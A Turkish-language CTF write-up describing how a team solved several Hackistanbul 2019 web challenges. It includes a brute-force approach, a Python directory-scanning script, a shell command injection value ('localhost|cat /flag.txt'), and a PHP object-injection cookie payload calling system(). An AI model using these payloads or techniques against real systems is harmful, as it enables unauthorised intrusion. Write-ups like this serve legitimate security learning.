---
layout: post
title:  "Hackistanbul 2019 30 ağustos CTF"
Date: 29 Ağustos 2019
Author: Süleyman ERGEN
tags: [hackistanbul, ctf]
License: CC BY
categories: [ctf]
---

# Hackistanbul 2019 30 ağustos CTF

Dün Hackistanbul 2. tur bitti. Bizde `MCLee` ekibi olarak katıldık. Yarışmanın sonuna writeup yazarak tamamlayak dedik :)

## TCE RIDER

![tce rider 1](/assets/ctf/ctf/hackistanbul2019/29agustos/tce-rider/tce-rider-1.png)

Soruda verilen linke girdiğimizde basit bir form bizi karşılıyor. Bide şu şekilde bir yazı:

> I saved the lyrics here: lyrics.txt My favorite word will give you something special

`lyrics.txt` dosyasını tarayıcıdan açtığımızda bir liste ile karşılaşıyoruz.

```text
Look
If you had
One shot
Or one opportunity
. . . . . . . . . .
. . . . . . . . . .
. . . . . . . . . .
. . . . . . . . . .
You only get one shot, do not miss your chance to blow
This opportunity comes once in a lifetime you better
You can do anything you set your mind to, man
```

Aynı zamanda soruda favori kelimeyi bulduğumuzda bize "özel bir şey" vereceğini söylüyor. Flag olması umuduyla hemen başladık. Ardandan metindeki her boşkuk karakterini enter karakteri (\n) karakteri ile değiştirdik. Yani her kelimeyi ayırarak bir wordlist oluşturduk.

Ardından bu listeyi burp suite ile "intruder" a aktarıyorum. Daha sonra brute force saldırısına başladık. Yaklaşık olarak 800 kelime var. Her bir kelime submit edildiğinde `action.php` yes yada no olarak cevap dönüyor ve redirect yapıyor. Doğru kelime `amplified`. Bu kelimeyi girdiğimizde yes olarak cevap gelecek.

Bu cevabın ardından defalarca kez redirect gelecek. Burpsuite ile redirecleri incelediğmizde flag karşımıza çıkıyor.

![tce rider 2](/assets/ctf/ctf/hackistanbul2019/29agustos/tce-rider/tce-rider-2.png)

## Reload!

Bu soruda `gobuster` yada `dirb` ile dizin taraması yaptığımızda doğru sonuç vermiyordu. Herhalde bu araçlara karşı bir önlem aldılar.

Bu işle için basit bir python scripti yazdık.

```python
import requests
import time

BASE_URI = "https://tc320accoq.hackistanbul.net/"
file = open("/usr/share/dirb/wordlists/common.txt")

while True:
    path = file.readline().strip()
    r = requests.get(BASE_URI + path)

    if r.status_code != 404:
        print(BASE_URI + path + " #$# " + str(r.status_code))
```

Bu script bize gerekli olan dizin bilgisini verdi. Bulunan dizin/dosya lardan `index.php` dosyasına gittiğimizde bizi `reloadCMS` karşılıyor.

![reload 1](/assets/ctf/ctf/hackistanbul2019/29agustos/reload/reload-1.png)

İnternetten hemen bi kopyasını indirip dosya yapısını inceleyerek başladık. Ardından dizin ve dosyaları sırayla deneyerek işe yarar bi şeyler bulmaya çalıştık.

![reload 2](/assets/ctf/ctf/hackistanbul2019/29agustos/reload/reload-2.png)

Biraz şansla `content/uploads/shell.php` dosyasını bulduk. Ardından flag :)

## Get'em all

Sorudaki linki açtığımızda ilk ismimizi soran bir input ile karşılaşıyoruz. Yanlış bir input girdiğimizde `Try harder!` yazan bir cevap alıyoruz.

![get em all 1](/assets/ctf/ctf/hackistanbul2019/29agustos/get-em-all/get-em-all-1.png)

Doğru input `hackistanbul`. Bu girdiyi fname, lname ve page olarak girdiğimizde bize bir php sayfası gösteriyor.

![get em all 2](/assets/ctf/ctf/hackistanbul2019/29agustos/get-em-all/get-em-all-2.png)

Ardından hemen php sayfasına gidiyoruz. Kaşımıza bir shell. Gerisi flagi yazdırmak.

![get em all 3](/assets/ctf/ctf/hackistanbul2019/29agustos/get-em-all/get-em-all-3.png)


## Machinima 2

Soruda verilen linke gittiğimizde basit bir metin ile karşılaşıyorum. Ardından biz dizin taraması ile `info.php` dosyasını buluyorum.

![machinima2 1](/assets/ctf/ctf/hackistanbul2019/29agustos/machinima2/machinima2-1.png)

Bu sayfa bizden bir ip adresi istiyor.

![machinima2 2](/assets/ctf/ctf/hackistanbul2019/29agustos/machinima2/machinima2-2.png)

ip adresi olarak `localhost` veriyorum. Veeee... ping komutu çıktısı. Bir shell komutu çalışıyor.

![machinima2 3](/assets/ctf/ctf/hackistanbul2019/29agustos/machinima2/machinima2-3.png)

O zaman ip adresi yerine bir shell kodu koyarsak flagi alırız. Mesela `ip=localhost|cat /flag.txt` gibi.


## Machinima

Bu soruda "cookie monster" ın bizden "data" beklediğini gösteren bir sayfa ile karşılaşıyoruz. Neyse hemen bi şeyler bulmak için dizin taraması başlatıyorum.

Bu soruda dizin taraması sonrasında `testing dosyasını buluyorum. Dosyada şu yazıyor.

```text
class Example2
{
   private $hook;

   function __construct()
   {
      // 
   }

   function __wakeup()
   {
      if (isset($this->hook)) eval($this->hook);
   }
}


.....

:)
```

Bu metni kopyalayıp google da arattığımda php object injection ile karşılaşıyorum. Owasp sayfasında kısa bir açıklamayı okuduktan sonra "data" keyi ile bir cookie göndermem gerektiğini öğreniyorum. Bu "data" nın içinde php objesi bulunacak.

Cookie objesi encode edilmeden şu şekilde.

```text
O:8:"Example2":1:{s:14:"Example2hook";s:24:"system('cat /flag.txt');";}
```

Url encode ettiğimizde ise şu:

```text
O%3A8%3A%22Example2%22%3A1%3A%7Bs%3A14%3A%22%00Example2%00hook%22%3Bs%3A24%3A%22system(%27cat%20%2Fflag.txt%27)%3B%22%3B%7D
```

Bu değeri cookie içine yerleştiriyoruz ve:

![machinima-1](/assets/ctf/ctf/hackistanbul2019/29agustos/machinima/machinima-1.png)
